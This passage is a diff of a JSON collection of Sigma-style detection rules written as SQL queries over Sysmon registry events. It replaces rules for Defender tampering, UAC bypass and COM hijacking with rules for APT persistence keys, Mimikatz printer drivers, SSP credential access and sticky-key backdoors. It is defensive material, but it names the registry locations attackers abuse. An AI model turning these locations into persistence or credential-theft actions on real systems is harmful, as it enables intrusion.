"4720b7df-40c3-48fd-bbdf-fd4b3c464f0d", - "status": "experimental", - "description": "Monitor the creation of a new key under 'TaskCache' when a new scheduled task is registered by a process that is not svchost.exe, which is suspicious", - "author": "Syed Hasan (@syedhasan009)", + "title": "OceanLotus Registry Activity", + "id": "4ac5fc44-a601-4c06-955b-309df8c4e9d4", + "status": "test", + "description": "Detects registry keys created in OceanLotus (also known as APT32) attacks", + "author": "megan201296, Jonhnathan Ribeiro", "tags": [ - "attack.persistence", - "attack.t1053", - "attack.t1053.005" + "attack.defense_evasion", + "attack.t1112" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Schedule\\\\TaskCache\\\\%' ESCAPE '\\') AND NOT (((TargetObject LIKE '%Microsoft\\\\Windows\\\\UpdateOrchestrator%' ESCAPE '\\' OR TargetObject LIKE '%Microsoft\\\\Windows\\\\SoftwareProtectionPlatform\\\\SvcRestartTask\\\\Index%' ESCAPE '\\' OR TargetObject LIKE '%Microsoft\\\\Windows\\\\Flighting\\\\OneSettings\\\\RefreshCache\\\\Index%' ESCAPE '\\')) OR (Image LIKE 'C:\\\\Windows\\\\%' ESCAPE '\\' AND Image LIKE '%\\\\TiWorker.exe' ESCAPE '\\') OR (Image LIKE 'C:\\\\WINDOWS\\\\system32\\\\svchost.exe' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\Microsoft.NET\\\\Framework%' ESCAPE '\\' AND Image LIKE '%\\\\ngen.exe' ESCAPE '\\' AND (TargetObject LIKE '%\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Schedule\\\\TaskCache\\\\Tasks\\\\{B66B135D-DA06-4FC4-95F8-7458E1D10129}%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Schedule\\\\TaskCache\\\\Tree\\\\Microsoft\\\\Windows\\\\.NET Framework\\\\.NET Framework NGEN%' ESCAPE '\\')) OR ((Image LIKE 'C:\\\\Program Files\\\\Microsoft Office\\\\root\\\\Integration\\\\Integrator.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Office\\\\root\\\\Integration\\\\Integrator.exe' ESCAPE '\\')) OR (Image LIKE 'C:\\\\Windows\\\\System32\\\\msiexec.exe' ESCAPE '\\') OR ((Image LIKE 'C:\\\\Program Files (x86)\\\\Dropbox\\\\Update\\\\DropboxUpdate.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Dropbox\\\\Update\\\\DropboxUpdate.exe' ESCAPE '\\')) OR (Image LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Schedule\\\\TaskCache\\\\Tree\\\\Microsoft\\\\Windows\\\\PLA\\\\Server Manager Performance Monitor\\\\%' ESCAPE '\\') OR (Image = 'System')))" + "SELECT * FROM logs WHERE ((EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetObject LIKE 'HKCU\\\\SOFTWARE\\\\Classes\\\\CLSID\\\\{E08A0F4B-1F65-4D4D-9A09-BD4625B9C5A1}\\\\Model' ESCAPE '\\' OR ((TargetObject LIKE 'HKCU\\\\SOFTWARE\\\\App\\\\%' ESCAPE '\\' OR TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\App\\\\%' ESCAPE '\\') AND (TargetObject LIKE '%AppXbf13d4ea2945444d8b13e2121cb6b663\\\\%' ESCAPE '\\' OR TargetObject LIKE '%AppX70162486c7554f7f80f481985d67586d\\\\%' ESCAPE '\\' OR TargetObject LIKE '%AppX37cc7fdccd644b4f85f4b22d5a3f105a\\\\%' ESCAPE '\\') AND (TargetObject LIKE '%Application' ESCAPE '\\' OR TargetObject LIKE '%DefaultIcon' ESCAPE '\\')) OR (TargetObject LIKE 'HKCU\\\\%' ESCAPE '\\' AND (TargetObject LIKE '%Classes\\\\AppXc52346ec40fb4061ad96be0e6cb7d16a\\\\%' ESCAPE '\\' OR TargetObject LIKE '%Classes\\\\AppX3bbba44c6cae4d9695755183472171e2\\\\%' ESCAPE '\\' OR TargetObject LIKE '%Classes\\\\CLSID\\\\{E3517E26-8E93-458D-A6DF-8030BC80528B}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%Classes\\\\CLSID\\\\{E08A0F4B-1F65-4D4D-9A09-BD4625B9C5A1}\\\\Model%' ESCAPE '\\'))))" ], - "filename": "registry_set_taskcache_entry.yml" + "filename": "registry_event_apt_oceanlotus_registry.yml" }, { - "title": "Suspicious New Printer Ports in Registry (CVE-2020-1048)", - "id": "7ec912f2-5175-4868-b811-ec13ad0f8567", + "title": "FlowCloud Malware", + "id": "5118765f-6657-4ddb-a487-d7bd673abbf1", "status": "test", - "description": "Detects a new and suspicious printer port creation in Registry that could be an attempt to exploit CVE-2020-1048", - "author": "EagleEye Team, Florian Roth (Nextron Systems), NVISO", + "description": "Detects FlowCloud malware from threat group TA410.", + "author": "NVISO", "tags": [ "attack.persistence", - "attack.execution", - "attack.defense_evasion", "attack.t1112" ], "falsepositives": [ - "New printer port install on host" + "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Ports%' ESCAPE '\\' AND (Details LIKE '%.dll%' ESCAPE '\\' OR Details LIKE '%.exe%' ESCAPE '\\' OR Details LIKE '%.bat%' ESCAPE '\\' OR Details LIKE '%.com%' ESCAPE '\\' OR Details LIKE '%C:%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((TargetObject LIKE 'HKLM\\\\HARDWARE\\\\{804423C2-F490-4ac3-BFA5-13DEDE63A71A}' ESCAPE '\\' OR TargetObject LIKE 'HKLM\\\\HARDWARE\\\\{A5124AF5-DF23-49bf-B0ED-A18ED3DEA027}' ESCAPE '\\' OR TargetObject LIKE 'HKLM\\\\HARDWARE\\\\{2DB80286-1784-48b5-A751-B6ED1F490303}' ESCAPE '\\') OR TargetObject LIKE 'HKLM\\\\SYSTEM\\\\Setup\\\\PrintResponsor\\\\%' ESCAPE '\\'))" ], - "filename": "registry_set_cve_2020_1048_new_printer_port.yml" - }, - { - "title": "Persistence Via Hhctrl.ocx", - "id": "f10ed525-97fe-4fed-be7c-2feecca941b1", - "status": "experimental", - "description": "Detects when an attacker modifies the registry value of the \"hhctrl\" to point to a custom binary", - "author": "Nasreddine Bencherchali (Nextron Systems)", - "tags": [ - "attack.persistence" - ], - "falsepositives": [ - "Unlikely" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\CLSID\\\\{52A2AAAE-085D-4187-97EA-8C30DB990436}\\\\InprocServer32\\\\(Default)%' ESCAPE '\\') AND NOT (Details LIKE 'C:\\\\Windows\\\\System32\\\\hhctrl.ocx' ESCAPE '\\'))" - ], - "filename": "registry_set_hhctrl_persistence.yml" + "filename": "registry_event_mal_flowcloud.yml" }, { - "title": "Execution DLL of Choice Using WAB.EXE", - "id": "fc014922-5def-4da9-a0fc-28c973f41bfb", + "title": "NetNTLM Downgrade Attack - Registry", + "id": "d67572a0-e2ec-45d6-b8db-c100d14b8ef2", "status": "test", - "description": "This rule detects that the path to the DLL written in the registry is different from the default one. Launched WAB.exe tries to load the DLL from Registry.", - "author": "oscd.community, Natalia Shornikova", + "description": "Detects NetNTLM downgrade attack", + "author": "Florian Roth (Nextron Systems), wagga", "tags": [ "attack.defense_evasion", - "attack.t1218" + "attack.t1562.001", + "attack.t1112" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\WAB\\\\DLLPath' ESCAPE '\\') AND NOT (Details LIKE '\\%CommonProgramFiles\\%\\\\System\\\\wab32.dll' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE '%SYSTEM\\\\%' ESCAPE '\\' AND TargetObject LIKE '%ControlSet%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Control\\\\Lsa%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\lmcompatibilitylevel' ESCAPE '\\' OR TargetObject LIKE '%\\\\NtlmMinClientSec' ESCAPE '\\' OR TargetObject LIKE '%\\\\RestrictSendingNTLMTraffic' ESCAPE '\\'))" ], - "filename": "registry_set_wab_dllpath_reg_change.yml" + "filename": "registry_event_net_ntlm_downgrade.yml" }, { - "title": "Add Debugger Entry To Hangs Key For Persistence", - "id": "833ef470-fa01-4631-a79b-6f291c9ac498", + "title": "HybridConnectionManager Service Installation - Registry", + "id": "ac8866c7-ce44-46fd-8c17-b24acff96ca8", "status": "experimental", - "description": "Detects when an attacker adds a new \"Debugger\" value to the \"Hangs\" key in order to achieve persistence which will get invoked when an application crashes", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the installation of the Azure Hybrid Connection Manager service to allow remote code execution from Azure function.", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ - "attack.persistence" + "attack.resource_development", + "attack.t1608" ], "falsepositives": [ - "This value is not set by default but could be rarly used by administrators" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\Windows Error Reporting\\\\Hangs\\\\Debugger%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetObject LIKE '%\\\\Services\\\\HybridConnectionManager%' ESCAPE '\\' OR (EventType = 'SetValue' AND Details LIKE '%Microsoft.HybridConnectionManager.Listener.exe%' ESCAPE '\\')))" ], - "filename": "registry_set_hangs_debugger_persistence.yml" + "filename": "registry_event_hybridconnectionmgr_svc_installation.yml" }, { - "title": "New DNS ServerLevelPluginDll Installed", - "id": "e61e8a88-59a9-451c-874e-70fcc9740d67", + "title": "Potential Ransomware Activity Using LegalNotice Message", + "id": "8b9606c9-28be-4a38-b146-0e313cc232c1", "status": "experimental", - "description": "Detects the installation of a DNS plugin DLL via ServerLevelPluginDll parameter in registry, which can be used to execute code in context of the DNS server (restart required)", - "author": "Florian Roth (Nextron Systems)", + "description": "Detect changes to the \"LegalNoticeCaption\" or \"LegalNoticeText\" registry values where the message set contains keywords often used in ransomware ransom messages", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1574.002", - "attack.t1112" + "attack.impact", + "attack.t1491.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\services\\\\DNS\\\\Parameters\\\\ServerLevelPluginDll' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND (TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\LegalNoticeCaption%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\LegalNoticeText%' ESCAPE '\\') AND (Details LIKE '%encrypted%' ESCAPE '\\' OR Details LIKE '%Unlock-Password%' ESCAPE '\\' OR Details LIKE '%paying%' ESCAPE '\\'))" ], - "filename": "registry_set_dns_server_level_plugin_dll.yml" + "filename": "registry_set_legalnotice_susp_message.yml" }, { - "title": "Hiding User Account Via SpecialAccounts Registry Key", - "id": "f8aebc67-a56d-4ec9-9fbe-7b0e8b7b4efd", + "title": "Windows Credential Editor Registry", + "id": "a6b33c02-8305-488f-8585-03cb2a7763f2", "status": "test", - "description": "Detects modifications to the registry key \"HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\Userlist\" where the value is set to \"0\" in order to hide user account from being listed on the logon screen.", - "author": "Nasreddine Bencherchali (Nextron Systems), frack113", + "description": "Detects the use of Windows Credential Editor (WCE)", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1564.002" + "attack.credential_access", + "attack.t1003.001", + "attack.s0005" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\SpecialAccounts\\\\UserList%' ESCAPE '\\' AND Details = 'DWORD (0x00000000)')" + "SELECT * FROM logs WHERE (EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE '%Services\\\\WCESERVICE\\\\Start%' ESCAPE '\\')" ], - "filename": "registry_set_special_accounts.yml" + "filename": "registry_event_hack_wce_reg.yml" }, { - "title": "Disable Windows Defender Functionalities Via Registry Keys", - "id": "0eb46774-f1ab-4a74-8238-1155855f2263", - "status": "experimental", - "description": "Detects when attackers or tools disable Windows Defender functionalities via the windows registry", - "author": "AlertIQ, Ján Trenčanský, frack113, Nasreddine Bencherchali", + "title": "Security Support Provider (SSP) Added to LSA Configuration", + "id": "eeb30123-9fbd-4ee8-aaa0-2e545bbed6dc", + "status": "test", + "description": "Detects the addition of a SSP to the registry. Upon a reboot or API call, SSP DLLs gain access to encrypted and plaintext passwords stored in Windows.", + "author": "iwillkeepwatch", "tags": [ - "attack.defense_evasion", - "attack.t1562.001" + "attack.persistence", + "attack.t1547.005" ], "falsepositives": [ - "Administrator actions" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows Defender\\\\%' ESCAPE '\\') AND (((TargetObject LIKE '%\\\\Real-Time Protection\\\\DisableBehaviorMonitoring' ESCAPE '\\' OR TargetObject LIKE '%\\\\Real-Time Protection\\\\DisableIOAVProtection' ESCAPE '\\' OR TargetObject LIKE '%\\\\Real-Time Protection\\\\DisableOnAccessProtection' ESCAPE '\\' OR TargetObject LIKE '%\\\\Real-Time Protection\\\\DisableRealtimeMonitoring' ESCAPE '\\' OR TargetObject LIKE '%\\\\Real-Time Protection\\\\DisableScanOnRealtimeEnable' ESCAPE '\\' OR TargetObject LIKE '%\\\\Reporting\\\\DisableEnhancedNotifications' ESCAPE '\\' OR TargetObject LIKE '%\\\\SpyNet\\\\DisableBlockAtFirstSeen' ESCAPE '\\' OR TargetObject LIKE '%\\\\DisableAntiSpyware' ESCAPE '\\' OR TargetObject LIKE '%\\\\DisableAntiVirus' ESCAPE '\\') AND Details = 'DWORD (0x00000001)') OR ((TargetObject LIKE '%\\\\SpyNet\\\\SpynetReporting' ESCAPE '\\' OR TargetObject LIKE '%\\\\SpyNet\\\\SubmitSamplesConsent' ESCAPE '\\' OR TargetObject LIKE '%\\\\MpEngine\\\\MpEnablePus' ESCAPE '\\') AND Details = 'DWORD (0x00000000)')))" + "SELECT * FROM logs WHERE ((EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Control\\\\Lsa\\\\Security Packages' ESCAPE '\\' OR TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Control\\\\Lsa\\\\OSConfig\\\\Security Packages' ESCAPE '\\') AND NOT ((Image LIKE 'C:\\\\Windows\\\\system32\\\\msiexec.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\syswow64\\\\MsiExec.exe' ESCAPE '\\')))" ], - "filename": "registry_set_windows_defender_tamper.yml" + "filename": "registry_event_ssp_added_lsa_config.yml" }, { - "title": "PowerShell as a Service in Registry", - "id": "4a5f5a5e-ac01-474b-9b4e-d61298c9df1d", + "title": "PrinterNightmare Mimimkatz Driver Name", + "id": "ba6b9e43-1d45-4d3c-a504-1043a64c8469", "status": "test", - "description": "Detects that a powershell code is written to the registry as a service.", - "author": "oscd.community, Natalia Shornikova", + "description": "Detects static QMS 810 and mimikatz driver name used by Mimikatz as exploited in CVE-2021-1675 and CVE-2021-34527", + "author": "Markus Neis, @markus_neis, Florian Roth", "tags": [ "attack.execution", - "attack.t1569.002" + "attack.t1204", + "cve.2021.1675", + "cve.2021.34527" ], "falsepositives": [ - "Unknown" + "Legitimate installation of printer driver QMS 810, Texas Instruments microLaser printer (unlikely)" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\Services\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\ImagePath' ESCAPE '\\' AND (Details LIKE '%powershell%' ESCAPE '\\' OR Details LIKE '%pwsh%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((TargetObject LIKE '%\\\\Control\\\\Print\\\\Environments\\\\Windows x64\\\\Drivers\\\\Version-3\\\\QMS 810\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Control\\\\Print\\\\Environments\\\\Windows x64\\\\Drivers\\\\Version-3\\\\mimikatz%' ESCAPE '\\') OR (TargetObject LIKE '%legitprinter%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Control\\\\Print\\\\Environments\\\\Windows%' ESCAPE '\\')) OR ((TargetObject LIKE '%\\\\Control\\\\Print\\\\Environments%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CurrentVersion\\\\Print\\\\Printers%' ESCAPE '\\') AND (TargetObject LIKE '%Gentil Kiwi%' ESCAPE '\\' OR TargetObject LIKE '%mimikatz printer%' ESCAPE '\\' OR TargetObject LIKE '%Kiwi Legit Printer%' ESCAPE '\\'))))" ], - "filename": "registry_set_powershell_as_service.yml" + "filename": "registry_event_mimikatz_printernightmare.yml" }, { - "title": "Outlook Macro Execution Without Warning Setting Enabled", - "id": "e3b50fa5-3c3f-444e-937b-0a99d33731cd", - "status": "test", - "description": "Detects the modification of Outlook security setting to allow unprompted execution of macros.", - "author": "@ScoubiMtl", + "title": "CMSTP Execution Registry Event", + "id": "b6d235fc-1d38-4b12-adbe-325f06728f37", + "status": "stable", + "description": "Detects various indicators of Microsoft Connection Manager Profile Installer execution", + "author": "Nik Seetharaman", "tags": [ - "attack.persistence", - "attack.command_and_control", - "attack.t1137", - "attack.t1008", - "attack.t1546" + "attack.defense_evasion", + "attack.execution", + "attack.t1218.003", + "attack.g0069", + "car.2019-04-001" ], "falsepositives": [ - "Unlikely" + "Legitimate CMSTP use (unlikely in modern enterprise environments)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\Outlook\\\\Security\\\\Level' ESCAPE '\\' AND Details LIKE '%0x00000001%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE '%\\\\cmmgr32.exe%' ESCAPE '\\')" ], - "filename": "registry_set_office_outlook_enable_macro_execution.yml" + "filename": "registry_event_cmstp_execution_by_registry.yml" }, { - "title": "Bypass UAC Using DelegateExecute", - "id": "46dd5308-4572-4d12-aa43-8938f0184d4f", + "title": "OilRig APT Registry Persistence", + "id": "7bdf2a7c-3acc-4091-9581-0a77dad1c5b5", "status": "test", - "description": "Bypasses User Account Control using a fileless method", - "author": "frack113", + "description": "Detects OilRig registry persistence as reported by Nyotron in their March 2018 report", + "author": "Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community", "tags": [ - "attack.privilege_escalation", + "attack.persistence", + "attack.g0049", + "attack.t1053.005", + "attack.s0111", + "attack.t1543.003", "attack.defense_evasion", - "attack.t1548.002" + "attack.t1112", + "attack.command_and_control", + "attack.t1071.004" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\open\\\\command\\\\DelegateExecute' ESCAPE '\\' AND Details = '(Empty)')" + "SELECT * FROM logs WHERE (EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\UMe' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\UT' ESCAPE '\\'))" ], - "filename": "registry_set_bypass_uac_using_delegateexecute.yml" + "filename": "registry_event_apt_oilrig_mar18.yml" }, { - "title": "Change User Account Associated with the FAX Service", - "id": "e3fdf743-f05b-4051-990a-b66919be1743", - "status": "experimental", - "description": "Detect change of the user account associated with the FAX service to avoid the escalation problem.", - "author": "frack113", + "title": "WINEKEY Registry Modification", + "id": "b98968aa-dbc0-4a9c-ac35-108363cbf8d5", + "status": "test", + "description": "Detects potential malicious modification of run keys by winekey or team9 backdoor", + "author": "omkar72", "tags": [ - "attack.defense_evasion", - "attack.t1112" + "attack.persistence", + "attack.t1547" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\Fax\\\\ObjectName' ESCAPE '\\' AND NOT (Details LIKE '%NetworkService%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE '%Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\Backup Mgr' ESCAPE '\\')" ], - "filename": "registry_set_fax_change_service_user.yml" + "filename": "registry_event_runkey_winekey.yml" }, { - "title": "Potential Persistence Via COM Hijacking From Suspicious Locations", - "id": "3d968d17-ffa4-4bc0-bfdc-f139de76ce77", + "title": "Creation of a Local Hidden User Account by Registry", + "id": "460479f3-80b7-42da-9c43-2cc1d54dbccd", "status": "experimental", - "description": "Detects potential COM object hijacking where the \"Server\" (In/Out) is pointing to a supsicious or unsuale location", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Sysmon registry detection of a local hidden user account.", + "author": "Christian Burkard (Nextron Systems)", "tags": [ "attack.persistence", - "attack.t1546.015" + "attack.t1136.001" ], "falsepositives": [ - "Probable legitimate applications. If you find these please add them to an exclusion list" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND (TargetObject LIKE 'HKCR\\\\CLSID\\\\%' ESCAPE '\\' OR TargetObject LIKE 'HKEY\\_CLASSES\\_ROOT\\\\CLSID\\\\%' ESCAPE '\\' OR TargetObject LIKE 'HKCU\\\\Software\\\\Classes\\\\CLSID\\\\%' ESCAPE '\\' OR TargetObject LIKE 'HKEY\\_CURRENT\\_USER\\\\Software\\\\Classes\\\\CLSID\\\\%' ESCAPE '\\') AND (TargetObject LIKE '%\\\\InprocServer32\\\\(Default)' ESCAPE '\\' OR TargetObject LIKE '%\\\\LocalServer32\\\\(Default)' ESCAPE '\\') AND (Details LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Details LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR Details LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR Details LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR Details LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR Details LIKE '%\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\%' ESCAPE '\\' OR Details LIKE '%\\\\System32\\\\spool\\\\drivers\\\\color\\\\%' ESCAPE '\\' OR Details LIKE '%\\%temp\\%%' ESCAPE '\\' OR Details LIKE '%\\%tmp\\%%' ESCAPE '\\' OR Details LIKE '%\\%appdata\\%%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE '%\\\\SAM\\\\SAM\\\\Domains\\\\Account\\\\Users\\\\Names\\\\%' ESCAPE '\\' AND TargetObject LIKE '%$' ESCAPE '\\' AND Image LIKE '%\\\\lsass.exe' ESCAPE '\\')" ], - "filename": "registry_set_persistence_com_hijacking_susp_locations.yml" + "filename": "registry_event_add_local_hidden_user.yml" }, { - "title": "Changing RDP Port to Non Standard Number", - "id": "509e84b9-a71a-40e0-834f-05470369bd1e", + "title": "Leviathan Registry Key Activity", + "id": "70d43542-cd2d-483c-8f30-f16b436fd7db", "status": "test", - "description": "Remote desktop is a common feature in operating systems.\nIt allows a user to log into an interactive session with a system desktop graphical user interface on a remote system.\nMicrosoft refers to its implementation of the Remote Desktop Protocol (RDP) as Remote Desktop Services (RDS).\n", - "author": "frack113", + "description": "Detects registry key used by Leviathan APT in Malaysian focused campaign", + "author": "Aidan Bracher", "tags": [ "attack.persistence", - "attack.t1547.010" - ], - "falsepositives": [ - "Unknown" + "attack.t1547.001" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Control\\\\Terminal Server\\\\WinStations\\\\RDP-Tcp\\\\PortNumber' ESCAPE '\\') AND NOT (Details = 'DWORD (0x00000d3d)'))" + "SELECT * FROM logs WHERE (EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE 'HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\ntkd' ESCAPE '\\')" ], - "filename": "registry_set_change_rdp_port.yml" + "filename": "registry_event_apt_leviathan.yml" }, { - "title": "CVE-2021-31979 CVE-2021-33771 Exploits", - "id": "32b5db62-cb5f-4266-9639-0fa48376ac00", + "title": "Sticky Key Like Backdoor Usage - Registry", + "id": "baca5663-583c-45f9-b5dc-ea96a22ce542", "status": "experimental", - "description": "Detects patterns as noticed in exploitation of Windows CVE-2021-31979 CVE-2021-33771 vulnerability and DevilsTongue malware by threat group Sourgum", - "author": "Sittikorn S, frack113", + "description": "Detects the usage and installation of a backdoor that uses an option to register a malicious debugger for built-in tools that are accessible in the login screen", + "author": "Florian Roth (Nextron Systems), @twjackomo, Jonhnathan Ribeiro, oscd.community", "tags": [ - "attack.credential_access", - "attack.t1566", - "attack.t1203", - "cve.2021.33771", - "cve.2021.31979" + "attack.privilege_escalation", + "attack.persistence", + "attack.t1546.008", + "car.2014-11-003", + "car.2014-11-008" ], "falsepositives": [ "Unlikely" ], "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND (TargetObject LIKE '%CLSID\\\\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\\\\InprocServer32\\\\(Default)' ESCAPE '\\' OR TargetObject LIKE '%CLSID\\\\{7C857801-7381-11CF-884D-00AA004B2E24}\\\\InProcServer32\\\\(Default)' ESCAPE '\\')) AND NOT ((Details LIKE '%system32\\\\wbem\\\\wmiutils.dll' ESCAPE '\\' OR Details LIKE '%system32\\\\wbem\\\\wbemsvc.dll' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\sethc.exe\\\\Debugger' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\utilman.exe\\\\Debugger' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\osk.exe\\\\Debugger' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows 